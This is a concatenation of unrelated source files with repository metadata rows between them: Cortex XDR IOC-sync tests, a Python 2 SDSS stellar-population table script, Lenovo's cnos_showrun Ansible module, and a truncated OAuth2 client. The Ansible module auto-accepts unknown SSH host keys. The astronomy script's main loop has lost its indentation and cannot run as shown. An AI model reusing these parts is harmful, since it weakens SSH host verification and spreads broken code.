        mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
        mocker.patch('XDR_iocs.return_outputs')
        iocs_to_keep(client)
        assert http_request.call_args.args[0] == 'iocs_to_keep', 'iocs_to_keep command url changed'
    def test_tim_insert_jsons(self, mocker):
        """tim_insert_jsons must push the modified iocs to the tim_insert_jsons/ endpoint."""
        http_request = mocker.patch.object(Client, 'http_request')
        mocker.patch.object(demisto, 'getIntegrationContext', return_value={'time': '2020-06-03T00:00:00Z'})
        iocs, _ = TestCreateFile.get_all_iocs(TestCreateFile.data_test_create_file_sync, 'txt')
        mocker.patch.object(demisto, 'searchIndicators', return_value=iocs)
        mocker.patch('XDR_iocs.return_outputs')
        tim_insert_jsons(client)
        assert http_request.call_args.kwargs['url_suffix'] == 'tim_insert_jsons/', 'tim_insert_jsons command url changed'
    def test_get_changes(self, mocker):
        """get_changes must convert the XDR reply and build the indicator timeline."""
        mocker.patch.object(demisto, 'getIntegrationContext', return_value={'ts': 1591142400000})
        mocker.patch.object(demisto, 'createIndicators')
        mocker.patch.object(demisto, 'searchIndicators', return_value={})
        xdr_res = {'reply': list(map(lambda xdr_ioc: xdr_ioc[0], TestXDRIOCToDemisto.data_test_xdr_ioc_to_demisto))}
        mocker.patch.object(Client, 'http_request', return_value=xdr_res)
        get_changes(client)
        xdr_ioc_to_timeline(list(map(lambda x: str(x[0].get('RULE_INDICATOR')), TestXDRIOCToDemisto.data_test_xdr_ioc_to_demisto)))  # noqa: E501
class TestParams:
    """Tests that the feedTags/tag and tlp_color params flow into created indicators."""
    # (demisto ioc, xdr ioc, integration params, expected tags, expected tlp color)
    tags_test = [
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
             'type': 'IP'},
            {'tlp_color': ''},
            'Cortex XDR',
            None
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
             'type': 'IP'},
            {'tag': 'tag1'},
            'tag1',
            None
        ),
        (
            {'value': '11.11.11.11', 'indicator_type': 'IP', 'score': 2},
            {'expiration_date': -1, 'indicator': '11.11.11.11', 'reputation': 'SUSPICIOUS', 'severity': 'INFO',
             'type': 'IP'},
            {'feedTags': 'tag2', 'tlp_color': 'AMBER'},
            'tag2',
            'AMBER'
        )
    ]
    @pytest.mark.parametrize('demisto_ioc, xdr_ioc, param_value, expected_tags, expected_tlp_color', tags_test)
    def test_feed_tags_and_tlp_color(self, demisto_ioc, xdr_ioc, param_value, expected_tags, expected_tlp_color, mocker):
        """
        Given:
            - IOC in XDR format.
        Then:
            - IOC in demisto format.
        """
        mocker.patch.object(demisto, 'searchIndicators', return_value={})
        mocker.patch.object(demisto, 'params', return_value=param_value)
        mocker.patch.object(demisto, 'getIntegrationContext', return_value={'ts': 1591142400000})
        # NOTE(review): duplicate of the searchIndicators patch above
        mocker.patch.object(demisto, 'searchIndicators', return_value={})
        outputs = mocker.patch.object(demisto, 'createIndicators')
        # mirror the integration's param handling: feedTags wins over tag
        Client.tag = demisto.params().get('feedTags', demisto.params().get('tag', Client.tag))
        Client.tlp_color = demisto.params().get('tlp_color')
        client = Client({'url': 'yana'})
        xdr_res = {'reply': list(map(lambda xdr_ioc: xdr_ioc[0], TestXDRIOCToDemisto.data_test_xdr_ioc_to_demisto))}
        mocker.patch.object(Client, 'http_request', return_value=xdr_res)
        get_changes(client)
        output = outputs.call_args.args[0]
        assert output[0]['fields']['tags'] == expected_tags
        assert output[0]['fields'].get('trafficlightprotocol') == expected_tlp_color
def test_file_deleted_for_create_file_sync(mocker):
    """The temp sync file must be removed even when create_file_sync raises."""
    temp_path = 'test'
    mocker.patch('XDR_iocs.get_temp_file', return_value=temp_path)
    open(temp_path, 'w').close()

    def explode(*_args, **_kwargs):
        raise DemistoException(temp_path)

    mocker.patch('XDR_iocs.create_file_sync', new=explode)
    with pytest.raises(DemistoException):
        get_sync_file()
    assert not os.path.exists(temp_path)
# (command function under test, name of the file-creating helper it wraps)
data_test_test_file_deleted = [
    (sync, 'create_file_sync'),
    (iocs_to_keep, 'create_file_iocs_to_keep'),
]


@pytest.mark.parametrize('method_to_test,iner_method', data_test_test_file_deleted)
@freeze_time('2020-06-03T02:00:00Z')
def test_file_deleted(mocker, method_to_test, iner_method):
    """The temp file must be removed even when the inner helper raises."""
    temp_path = 'test'
    mocker.patch('XDR_iocs.get_temp_file', return_value=temp_path)
    open(temp_path, 'w').close()

    def explode(*_args, **_kwargs):
        raise DemistoException(temp_path)

    mocker.patch(f'XDR_iocs.{iner_method}', new=explode)
    with pytest.raises(DemistoException):
        method_to_test(None)
    assert not os.path.exists(temp_path)
| VirusTotal/content | Packs/CortexXDR/Integrations/XDR_iocs/XDR_iocs_test.py | Python | mit | 33,686 | [
"Amber"
] | 8471ab5f21264c9c7ce8d2a22b3ca3e2c08b0c53a2df69e554ab7a46f0aecd71 |
# Build the per-plate FIREFLY stellar population summary table (SDSS DR14).
# NOTE(review): this is Python 2 code (print statement syntax below).
import time
t0t=time.time()
from os.path import join
import os
import numpy as n
import glob
import sys
import astropy.io.fits as fits
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as p
# sentinel value used for missing entries in the output table
dV=-9999.99
# command line arguments: plate number and the name of the environment
# variable pointing at the data release root directory
plate = sys.argv[1] # '9003'
env = sys.argv[2] # '9003'
print plate, env
#python create_summary_tables_sdss_dr12.py 3785 EBOSSDR14_DIR
# initial catalog
init_cat = join( os.environ[env], "catalogs", "perPlate", "sp-"+plate.zfill(4)+".fits")
# NOTE(review): 'dir' shadows the builtin of the same name
dir = 'stellarpop'
suffix = ".fits"
# output locations for the summary table and its images
out_dir = os.path.join(os.environ[env], 'stellarpop', plate)
im_dir = os.path.join(os.environ[env], 'stellarpop', plate, 'images')
if os.path.isdir(out_dir)==False:
    os.makedirs(out_dir)
if os.path.isdir(im_dir)==False:
    os.makedirs(im_dir)
path_2_out_file = join( out_dir, "spFlyPlate-"+plate.zfill(4)+".fits")
im_file = "spFlyPlate-"+plate.zfill(4)+".png"
path_2_im_file = os.path.join(im_dir, im_file)
# NOTE(review): bare expression below has no effect
path_2_im_file
# primary FITS header describing the plate and the fitting setup
prihdr = fits.Header()
prihdr['file'] = os.path.basename(path_2_out_file)
prihdr['plate'] = int(plate)
prihdr['models'] = 'Maraston_2011'
prihdr['library'] = 'MILES'
prihdr['fitter'] = 'FIREFLY'
prihdr['author'] = 'johan comparat'
prihdr['DR'] = 14
def get_table_entry_full(hduSPM):
    """Flatten one FIREFLY stellar-population HDU into a summary-table row.

    Parameters
    ----------
    hduSPM : object with a FITS-like ``header`` mapping
        Carries the FIREFLY fit results for one IMF: global keys
        ('age_lightW', 'stellar_mass', 'EBV', 'ssp_number', 'chi2',
        'ndof', ...) plus per-component keys 'stellar_mass_ssp_<i>',
        'age_ssp_<i>', etc.

    Returns
    -------
    (row, headerA) : (1-d float array, str)
        ``row`` holds the 19 global quantities followed by 6 values per
        SSP component, padded with the sentinel ``dV`` up to 8 components;
        ``headerA`` is the matching space-separated column-name string.
    """
    prefix = hduSPM.header['IMF'] + "_"  # e.g. 'Chabrier_'
    headerA =" "+prefix+"age_lightW "+prefix+"age_lightW_err_plus "+prefix+"age_lightW_err_minus "+prefix+"metallicity_lightW "+prefix+"metallicity_lightW_err_plus "+prefix+"metallicity_lightW_err_minus "+prefix+"age_massW "+prefix+"age_massW_err_plus "+prefix+"age_massW_err_minus "+prefix+"metallicity_massW "+prefix+"metallicity_massW_err_plus "+prefix+"metallicity_massW_err_minus "+prefix+"stellar_mass "+prefix+"stellar_mass_err_plus "+prefix+"stellar_mass_err_minus "+prefix+"spm_EBV "+prefix+"nComponentsSSP "+prefix+"chi2 "+prefix+"ndof "
    # Ages are stored as log10(yr) in the header; convert back to linear.
    table_entry = [10**hduSPM.header['age_lightW']
        , 10**hduSPM.header['age_lightW_up']
        , 10**hduSPM.header['age_lightW_low']
        , hduSPM.header['metallicity_lightW']
        , hduSPM.header['metallicity_lightW_up']
        , hduSPM.header['metallicity_lightW_low']
        , 10**hduSPM.header['age_massW']
        , 10**hduSPM.header['age_massW_up']
        , 10**hduSPM.header['age_massW_low']
        , hduSPM.header['metallicity_massW']
        , hduSPM.header['metallicity_massW_up']
        , hduSPM.header['metallicity_massW_low']
        , hduSPM.header['stellar_mass']
        , hduSPM.header['stellar_mass_up']
        , hduSPM.header['stellar_mass_low']
        , hduSPM.header['EBV']
        , hduSPM.header['ssp_number']
        , hduSPM.header['chi2']
        , hduSPM.header['ndof']
        ]
    for iii in n.arange(hduSPM.header['ssp_number']):
        table_entry.append( hduSPM.header['stellar_mass_ssp_'+str(iii)] )
        table_entry.append( hduSPM.header['age_ssp_'+str(iii)] )
        table_entry.append( hduSPM.header['metal_ssp_'+str(iii)] )
        table_entry.append( hduSPM.header['SFR_ssp_'+str(iii)] )
        table_entry.append( hduSPM.header['weightMass_ssp_'+str(iii)] )
        table_entry.append( hduSPM.header['weightLight_ssp_'+str(iii)] )
        # BUG FIX: the original wrote '...ndofage_ssp_<i>' here, which
        # mislabelled the per-SSP age column; use 'age_ssp_<i>' to match
        # both the values appended above and the padding branch below.
        headerA += ' '+prefix+'stellar_mass_ssp_'+str(iii) + ' '+prefix+'age_ssp_'+str(iii) + ' '+prefix+'metal_ssp_'+str(iii) + ' '+prefix+'SFR_ssp_'+str(iii) + ' '+prefix+'weightMass_ssp_'+str(iii) + ' '+prefix+'weightLight_ssp_'+str(iii)
    if hduSPM.header['ssp_number']<8 :
        # Pad missing components with the sentinel so every row has the
        # same length (19 + 8*6 columns).
        for iii in n.arange(hduSPM.header['ssp_number'], 8, 1):
            # extend (not append a nested list) so the row stays flat
            table_entry.extend([dV, dV, dV, dV, dV, dV])
            headerA += ' '+prefix+'stellar_mass_ssp_'+str(iii) + ' '+prefix+'age_ssp_'+str(iii) + ' '+prefix+'metal_ssp_'+str(iii) + ' '+prefix+'SFR_ssp_'+str(iii) + ' '+prefix+'weightMass_ssp_'+str(iii) + ' '+prefix+'weightLight_ssp_'+str(iii)
    # Single flatten is enough; the original double n.hstack was redundant.
    return n.hstack(table_entry), headerA
# step 2 : match to thecreated data set
hdu_orig_table = fits.open(init_cat)
orig_table = hdu_orig_table[1].data
orig_cols = orig_table.columns
table_all = []
headers = ""
for fiber, mjd in zip(orig_table['FIBERID'], orig_table['MJD']):
fitFile = join( os.environ[env], dir, plate, "spFly-"+plate.zfill(4)+"-"+str(mjd)+"-"+str(fiber).zfill(4)+suffix)
if os.path.isfile(fitFile):
#print fitFile
table_entry_1, headers_1 = get_table_entry_full( hduSPM=fits.open(fitFile)[1] )
table_entry_2, headers_2 = get_table_entry_full( hduSPM=fits.open(fitFile)[2] )
table_entry_3, headers_3 = get_table_entry_full( hduSPM=fits.open(fitFile)[3] )
headers = headers_1 + headers_2 + headers_3
table_all.append(n.hstack((table_entry_1, table_entry_2, table_entry_3)))
#print len(table_all[-1])
fitFileLast = fitFile
else:
table_all.append(n.ones(195)*dV)
newDat = n.transpose(table_all)
all_cols = []
for data_array, head in zip(newDat, headers.split()):
all_cols.append(fits.Column(name=head, format='D', array=data_array))
new_cols = fits.ColDefs(all_cols)
tbhdu = fits.BinTableHDU.from_columns(orig_cols + new_cols)
sp_cha=fits.open(fitFileLast)[0]
prihdr['model'] = sp_cha.header['model']
prihdr['ageMin'] = sp_cha.header['ageMin']
prihdr['ageMax'] = sp_cha.header['ageMax']
prihdr['Zmin'] = sp_cha.header['Zmin']
prihdr['Zmax'] = sp_cha.header['Zmax']
prihdu = fits.PrimaryHDU(header=prihdr)
hdu = fits.HDUList([prihdu, tbhdu])
if os.path.isfile(path_2_out_file):
os.remove(path_2_out_file)
hdu.writeto(path_2_out_file)
##################################################
##################################################
test = fits.open(path_2_out_file)
converged3 = (test[1].data['Salpeter_age_lightW'] != dV ) & (test[1].data['Chabrier_age_lightW'] != dV ) & (test[1].data['Kroupa_age_lightW'] != dV )
# now creates the figure per model
fig = p.figure(0, figsize = (8, 8), frameon=False)#, tight_layout=True)
rect = 0.2, 0.15, 0.85, 0.95
#ax = fig.add_axes(rect, frameon=False)
# panel age distribution
fig.add_subplot(2,2,1)
bins = n.arange(6,10,0.1)
nn_s, bb = n.histogram(n.log10(test[1].data['Salpeter_age_lightW'][converged3]), normed = True, bins=bins)
nn_k, bb = n.histogram(n.log10(test[1].data['Kroupa_age_lightW'][converged3]) , normed = True, bins=bins)
nn_c, bb = n.histogram(n.log10(test[1].data['Chabrier_age_lightW'][converged3]), normed = True, bins=bins)
xb = (bins[:-1]+bins[1:])/2.
p.plot(xb, nn_s, label="Salpeter" , rasterized =True )
p.plot(xb, nn_k, label="Kroupa" , rasterized =True )
p.plot(xb, nn_c, label="Chabrier" , rasterized =True )
p.legend(frameon=False)
p.xlabel('log(age/[yr])')
p.ylabel('Normed cumulative distribution')
p.title("plate=" + plate)
p.grid()
# panel stellar mass
fig.add_subplot(2,2,2)
bins = n.arange(8,12.5,0.1)
nn_s, bb = n.histogram(test[1].data['Salpeter_stellar_mass'][converged3], normed = True, bins=bins)
nn_k, bb = n.histogram(test[1].data[ 'Kroupa_stellar_mass'][converged3], normed = True, bins=bins)
nn_c, bb = n.histogram(test[1].data['Chabrier_stellar_mass'][converged3], normed = True, bins=bins)
xb = (bins[:-1]+bins[1:])/2.
p.plot(xb, nn_s, label="Salpeter" , rasterized =True )
p.plot(xb, nn_k, label="Kroupa" , rasterized =True )
p.plot(xb, nn_c, label="Chabrier" , rasterized =True )
p.xlabel(r'$\log(mass/[M_\odot])$')
#p.ylabel('Normed distribution')
p.grid()
# panels stellar mass difference panels
fig.add_subplot(2,2,3)
p.plot(test[1].data[ 'Kroupa_stellar_mass'][converged3], test[1].data['Salpeter_stellar_mass'][converged3] - test[1].data[ 'Kroupa_stellar_mass'][converged3], 'k+', rasterized = True, label='Salpeter - Kroupa')
p.xlabel(r'$\log(mass/[M_\odot])$ Kroupa')
p.ylabel(r'$\Delta(\log(M)$')
p.grid()
p.ylim((-0.6,0.6))
p.legend(frameon=False)
fig.add_subplot(2,2,4)
p.plot(test[1].data[ 'Kroupa_stellar_mass'][converged3], test[1].data['Chabrier_stellar_mass'][converged3] - test[1].data[ 'Kroupa_stellar_mass'][converged3], 'k+', rasterized = True, label='Chabrier - Kroupa')
p.xlabel(r'$\log(mass/[M_\odot])$ Kroupa')
#p.ylabel('mass (Chabrier - Kroupa)')
p.ylim((-0.6,0.6))
p.legend(frameon=False)
p.grid()
p.savefig(path_2_im_file)
p.clf()
print time.time()-t0t
sys.exit()
orig_cols.del_col('CHUNK' )
#orig_cols.del_col('PROGRAMNAME' )
orig_cols.del_col('PLATERUN' )
#orig_cols.del_col('PLATEQUALITY' )
#orig_cols.del_col('PLATESN2' )
orig_cols.del_col('DEREDSN2' )
orig_cols.del_col('LAMBDA_EFF' )
orig_cols.del_col('BLUEFIBER' )
orig_cols.del_col('ZOFFSET' )
orig_cols.del_col('SNTURNOFF' )
orig_cols.del_col('NTURNOFF' )
orig_cols.del_col('SPECPRIMARY' )
orig_cols.del_col('SPECSDSS' )
orig_cols.del_col('SPECLEGACY' )
orig_cols.del_col('SPECSEGUE' )
orig_cols.del_col('SPECSEGUE1' )
orig_cols.del_col('SPECSEGUE2' )
orig_cols.del_col('SPECBOSS' )
#orig_cols.del_col('BOSS_SPECOBJ_ID' )
orig_cols.del_col('SEGUE1_TARGET1' )
orig_cols.del_col('SEGUE1_TARGET2' )
orig_cols.del_col('SEGUE2_TARGET1' )
orig_cols.del_col('SEGUE2_TARGET2' )
orig_cols.del_col('MARVELS_TARGET1' )
orig_cols.del_col('MARVELS_TARGET2' )
orig_cols.del_col('PLATEID' )
orig_cols.del_col('NSPECOBS' )
orig_cols.del_col('FIRSTRELEASE' )
orig_cols.del_col('DESIGNID' )
orig_cols.del_col('CX' )
orig_cols.del_col('CY' )
orig_cols.del_col('CZ' )
orig_cols.del_col('XFOCAL' )
orig_cols.del_col('YFOCAL' )
orig_cols.del_col('TFILE' )
orig_cols.del_col('TCOLUMN' )
orig_cols.del_col('NPOLY' )
orig_cols.del_col('THETA' )
orig_cols.del_col('WAVEMIN' )
orig_cols.del_col('WAVEMAX' )
orig_cols.del_col('WCOVERAGE' )
#orig_cols.del_col('SN_MEDIAN_ALL' )
#orig_cols.del_col('SN_MEDIAN' )
orig_cols.del_col('CHI68P' )
orig_cols.del_col('FRACNSIGMA' )
orig_cols.del_col('FRACNSIGHI' )
orig_cols.del_col('FRACNSIGLO' )
orig_cols.del_col('SPECTROFLUX' )
orig_cols.del_col('SPECTROFLUX_IVAR' )
orig_cols.del_col('SPECTROSYNFLUX' )
orig_cols.del_col('SPECTROSYNFLUX_IVAR' )
orig_cols.del_col('SPECTROSKYFLUX' )
orig_cols.del_col('ANYANDMASK' )
orig_cols.del_col('ANYORMASK' )
orig_cols.del_col('SPEC1_G' )
orig_cols.del_col('SPEC1_R' )
orig_cols.del_col('SPEC1_I' )
orig_cols.del_col('SPEC2_G' )
orig_cols.del_col('SPEC2_R' )
orig_cols.del_col('SPEC2_I' )
orig_cols.del_col('ELODIE_FILENAME' )
orig_cols.del_col('ELODIE_OBJECT' )
orig_cols.del_col('ELODIE_SPTYPE' )
orig_cols.del_col('ELODIE_BV' )
orig_cols.del_col('ELODIE_TEFF' )
orig_cols.del_col('ELODIE_LOGG' )
orig_cols.del_col('ELODIE_FEH' )
orig_cols.del_col('ELODIE_Z' )
orig_cols.del_col('ELODIE_Z_ERR' )
orig_cols.del_col('ELODIE_Z_MODELERR' )
orig_cols.del_col('ELODIE_RCHI2' )
orig_cols.del_col('ELODIE_DOF' )
orig_cols.del_col('Z_PERSON' )
orig_cols.del_col('CLASS_PERSON' )
orig_cols.del_col('Z_CONF_PERSON' )
orig_cols.del_col('COMMENTS_PERSON' )
orig_cols.del_col('CALIBFLUX' )
orig_cols.del_col('CALIBFLUX_IVAR' )
orig_cols.del_col('SURVEY' )
orig_cols.del_col('INSTRUMENT' )
orig_cols.del_col('CHUNK' )
orig_cols.del_col('PROGRAMNAME' )
orig_cols.del_col('PLATERUN' )
orig_cols.del_col('PLATEQUALITY' )
orig_cols.del_col('PLATESN2' )
orig_cols.del_col('DEREDSN2' )
orig_cols.del_col('LAMBDA_EFF' )
orig_cols.del_col('BLUEFIBER' )
orig_cols.del_col('ZOFFSET' )
orig_cols.del_col('SNTURNOFF' )
orig_cols.del_col('NTURNOFF' )
orig_cols.del_col('SPECPRIMARY' )
orig_cols.del_col('SPECSDSS' )
orig_cols.del_col('SPECLEGACY' )
orig_cols.del_col('SPECSEGUE' )
orig_cols.del_col('SPECSEGUE1' )
orig_cols.del_col('SPECSEGUE2' )
orig_cols.del_col('SPECBOSS' )
orig_cols.del_col('BOSS_SPECOBJ_ID' )
orig_cols.del_col('SPECOBJID' )
orig_cols.del_col('FLUXOBJID' )
orig_cols.del_col('BESTOBJID' )
orig_cols.del_col('TARGETOBJID' )
orig_cols.del_col('PLATEID' )
orig_cols.del_col('NSPECOBS' )
orig_cols.del_col('FIRSTRELEASE' )
orig_cols.del_col('RUN2D' )
orig_cols.del_col('RUN1D' )
orig_cols.del_col('DESIGNID' )
orig_cols.del_col('CX' )
orig_cols.del_col('CY' )
orig_cols.del_col('CZ' )
orig_cols.del_col('XFOCAL' )
orig_cols.del_col('YFOCAL' )
orig_cols.del_col('SOURCETYPE' )
orig_cols.del_col('TARGETTYPE' )
orig_cols.del_col('PRIMTARGET' )
orig_cols.del_col('SECTARGET' )
orig_cols.del_col('LEGACY_TARGET1' )
orig_cols.del_col('LEGACY_TARGET2' )
orig_cols.del_col('SPECIAL_TARGET1' )
orig_cols.del_col('SPECIAL_TARGET2' )
orig_cols.del_col('SEGUE1_TARGET1' )
orig_cols.del_col('SEGUE1_TARGET2' )
orig_cols.del_col('SEGUE2_TARGET1' )
orig_cols.del_col('SEGUE2_TARGET2' )
orig_cols.del_col('MARVELS_TARGET1' )
orig_cols.del_col('MARVELS_TARGET2' )
orig_cols.del_col('BOSS_TARGET1' )
orig_cols.del_col('BOSS_TARGET2' )
orig_cols.del_col('EBOSS_TARGET0' )
orig_cols.del_col('ANCILLARY_TARGET1')
orig_cols.del_col('ANCILLARY_TARGET2')
orig_cols.del_col('SPECTROGRAPHID' )
orig_cols.del_col('PLATE' )
orig_cols.del_col('TILE' )
orig_cols.del_col('MJD' )
orig_cols.del_col('FIBERID' )
orig_cols.del_col('OBJID' )
orig_cols.del_col('PLUG_RA' )
orig_cols.del_col('PLUG_DEC' )
orig_cols.del_col('CLASS' )
orig_cols.del_col('SUBCLASS' )
orig_cols.del_col('Z' )
orig_cols.del_col('Z_ERR' )
orig_cols.del_col('RCHI2' )
orig_cols.del_col('DOF' )
orig_cols.del_col('RCHI2DIFF' )
orig_cols.del_col('TFILE' )
orig_cols.del_col('TCOLUMN' )
orig_cols.del_col('NPOLY' )
orig_cols.del_col('THETA' )
orig_cols.del_col('VDISP' )
orig_cols.del_col('VDISP_ERR' )
orig_cols.del_col('VDISPZ' )
orig_cols.del_col('VDISPZ_ERR' )
orig_cols.del_col('VDISPCHI2' )
orig_cols.del_col('VDISPNPIX' )
orig_cols.del_col('VDISPDOF' )
orig_cols.del_col('WAVEMIN' )
orig_cols.del_col('WAVEMAX' )
orig_cols.del_col('WCOVERAGE' )
orig_cols.del_col('ZWARNING' )
orig_cols.del_col('SN_MEDIAN_ALL' )
orig_cols.del_col('SN_MEDIAN' )
orig_cols.del_col('CHI68P' )
orig_cols.del_col('FRACNSIGMA' )
orig_cols.del_col('FRACNSIGHI' )
orig_cols.del_col('FRACNSIGLO' )
orig_cols.del_col('SPECTROFLUX' )
orig_cols.del_col('SPECTROFLUX_IVAR' )
orig_cols.del_col('SPECTROSYNFLUX' )
orig_cols.del_col('SPECTROSYNFLUX_IVAR' )
orig_cols.del_col('SPECTROSKYFLUX' )
orig_cols.del_col('ANYANDMASK' )
orig_cols.del_col('ANYORMASK' )
orig_cols.del_col('SPEC1_G' )
orig_cols.del_col('SPEC1_R' )
orig_cols.del_col('SPEC1_I' )
orig_cols.del_col('SPEC2_G' )
orig_cols.del_col('SPEC2_R' )
orig_cols.del_col('SPEC2_I' )
orig_cols.del_col('ELODIE_FILENAME' )
orig_cols.del_col('ELODIE_OBJECT' )
orig_cols.del_col('ELODIE_SPTYPE' )
orig_cols.del_col('ELODIE_BV' )
orig_cols.del_col('ELODIE_TEFF' )
orig_cols.del_col('ELODIE_LOGG' )
orig_cols.del_col('ELODIE_FEH' )
orig_cols.del_col('ELODIE_Z' )
orig_cols.del_col('ELODIE_Z_ERR' )
orig_cols.del_col('ELODIE_Z_MODELERR' )
orig_cols.del_col('ELODIE_RCHI2' )
orig_cols.del_col('ELODIE_DOF' )
orig_cols.del_col('Z_NOQSO' )
orig_cols.del_col('Z_ERR_NOQSO' )
orig_cols.del_col('ZWARNING_NOQSO' )
orig_cols.del_col('CLASS_NOQSO' )
orig_cols.del_col('SUBCLASS_NOQSO' )
orig_cols.del_col('RCHI2DIFF_NOQSO' )
orig_cols.del_col('Z_PERSON' )
orig_cols.del_col('CLASS_PERSON' )
orig_cols.del_col('Z_CONF_PERSON' )
orig_cols.del_col('COMMENTS_PERSON' )
orig_cols.del_col('CALIBFLUX' )
orig_cols.del_col('CALIBFLUX_IVAR' )
| JohanComparat/pySU | spm/bin/create_summary_tables.py | Python | cc0-1.0 | 17,858 | [
"Firefly"
] | 9bf93ac606254c0a5f4d3d3c8a9537b48e1a0792f5060ece272616144ff604c1 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Lenovo, Inc.
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
# Module to display running config of Switches
# Lenovo Networking
#
ANSIBLE_METADATA = {'status': ['preview'],
'supported_by': 'community',
'version': '1.0'}
DOCUMENTATION = '''
---
module: cnos_showrun
short_description: Collect the current running configuration on devices running Lenovo CNOS
description:
- This module allows you to view the switch running configuration. It executes the display running-config CLI
command on a switch and returns a file containing the current running configuration of the target network
device. This module uses SSH to manage network device configuration.
The results of the operation will be placed in a directory named 'results'
that must be created by the user in their local directory to where the playbook is run.
For more information about this module from Lenovo and customizing it usage for your
use cases, please visit our [User Guide](http://systemx.lenovofiles.com/help/index.jsp?topic=%2Fcom.lenovo.switchmgt.ansible.doc%2Fcnos_showrun.html)
version_added: "2.3"
extends_documentation_fragment: cnos
options: {}
'''
EXAMPLES = '''
Tasks : The following are examples of using the module cnos_showrun. These are written in the main.yml file of the tasks directory.
---
- name: Run show running-config
cnos_showrun:
host: "{{ inventory_hostname }}"
username: "{{ hostvars[inventory_hostname]['username'] }}"
password: "{{ hostvars[inventory_hostname]['password'] }}"
deviceType: "{{ hostvars[inventory_hostname]['deviceType'] }}"
enablePassword: "{{ hostvars[inventory_hostname]['enablePassword'] }}"
outputfile: "./results/test_showrun_{{ inventory_hostname }}_output.txt"
'''
RETURN = '''
return value: |
On successful execution, the method returns a message in JSON format
[Running Configuration saved in file]
Upon any failure, the method returns an error display string.
'''
import sys
import paramiko
import time
import argparse
import socket
import array
import json
import time
import re
try:
from ansible.module_utils import cnos
HAS_LIB = True
except:
HAS_LIB = False
from ansible.module_utils.basic import AnsibleModule
from collections import defaultdict
def main():
    """Entry point: collect `display running-config` output from a CNOS switch.

    Reads connection parameters from the Ansible module arguments, runs the
    CLI command over an interactive SSH session, appends the raw output to
    ``outputfile`` and exits the module with a success message or the parsed
    device error.
    """
    module = AnsibleModule(
        argument_spec=dict(
            outputfile=dict(required=True),
            host=dict(required=True),
            username=dict(required=True),
            password=dict(required=True, no_log=True),
            enablePassword=dict(required=False, no_log=True),),
        supports_check_mode=False)
    username = module.params['username']
    password = module.params['password']
    enablePassword = module.params['enablePassword']
    cliCommand = "display running-config"
    outputfile = module.params['outputfile']
    hostIP = module.params['host']
    output = ""
    # Create instance of SSHClient object
    remote_conn_pre = paramiko.SSHClient()
    # Automatically add untrusted hosts (make sure okay for security policy in your environment)
    remote_conn_pre.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # initiate SSH connection with the switch
    remote_conn_pre.connect(hostIP, username=username, password=password)
    time.sleep(2)
    # Use invoke_shell to establish an 'interactive session'
    remote_conn = remote_conn_pre.invoke_shell()
    time.sleep(2)
    # Enable and enter configure terminal then send command
    output = output + cnos.waitForDeviceResponse("\n", ">", 2, remote_conn)
    output = output + cnos.enterEnableModeForDevice(enablePassword, 3, remote_conn)
    # Make terminal length = 0
    output = output + cnos.waitForDeviceResponse("terminal length 0\n", "#", 2, remote_conn)
    # Send the CLi command
    output = output + cnos.waitForDeviceResponse(cliCommand + "\n", "#", 2, remote_conn)
    # FIX: use a context manager so the handle is always closed (the original
    # leaked it on a failed write and shadowed the Python 2 'file' builtin).
    with open(outputfile, "a") as out_file:
        out_file.write(output)
    errorMsg = cnos.checkOutputForError(output)
    if errorMsg is None:
        module.exit_json(changed=True, msg="Running Configuration saved in file ")
    else:
        module.fail_json(msg=errorMsg)
if __name__ == '__main__':
main()
| adityacs/ansible | lib/ansible/modules/network/lenovo/cnos_showrun.py | Python | gpl-3.0 | 4,951 | [
"VisIt"
] | 7c0cb18fb0febdef08fc00fd5ddb8b002fe0aa15e6121a1affbf5f262848552d |
__author__ = "Samuel Jackson"
__date__ = "December 2, 2014"
__license__ = "MIT"
import requests
import json
from constants import *
from request_handler import RequestHandler
class OAuth2ResourceOwner(RequestHandler):
    """ Handles retrieving resources from the specified end-points.

    This extension adds functionality for the resource owner OAuth2
    specification. Authentication is originally supplied by the user via their
    username and password (resource credentials). Access and refresh tokens are
    obtained and can be cached locally. This class will automatically handle
    refreshing the tokens as required. See RFC6749 for more info.

    :param token_endpoint: the end point to request oauth2 tokens from.
    """
    def __init__(self, token_endpoint):
        super(OAuth2ResourceOwner, self).__init__()
        self.token_endpoint = token_endpoint

    def request_auth_with_client_credentials(self, username, password):
        """Request authentication using the resource owners credentials

        This accquires the access tokens for the first time and discards the
        username and password once used.

        :param username: username of the resource owner
        :param password: password of the resource owner
        :raises ValueError: if the token endpoint response lacks either token
        """
        payload = {'grant_type': 'password', 'username': username, 'password': password}
        response = self.make_request(self.token_endpoint, params=payload)
        json_response = response.json()
        if 'access_token' not in json_response:
            raise ValueError("Access token not present in response!")
        if 'refresh_token' not in json_response:
            raise ValueError("Refresh token not present in response!")
        self._refresh_auth_state(json_response)

    def request_auth_with_refresh_token(self):
        """Use a refresh token to generate a new oauth access token."""
        payload = {
            'grant_type': 'refresh_token',
            'refresh_token': self.refresh_token
        }
        response = self.make_request(self.token_endpoint, params=payload)
        json_response = response.json()
        self._refresh_auth_state(json_response)

    def make_request(self, end_point, end_point_vars={}, params={}):
        """Make a request to Csa API at the specified end point

        This method is override from the request handler class and will refresh
        the oauth tokens if neccessary.

        :param end_point: string representing the end resource request
        :param end_point_vars: dictionary of variables to be replaced in the uri
        :param params: dictionary of parameters to be passed via GET/POST
        """
        response = super(OAuth2ResourceOwner, self) \
            .make_request(end_point, end_point_vars, params)

        if response.status_code == requests.codes.unauthorized:
            # 401 without an explicit error body means the access token
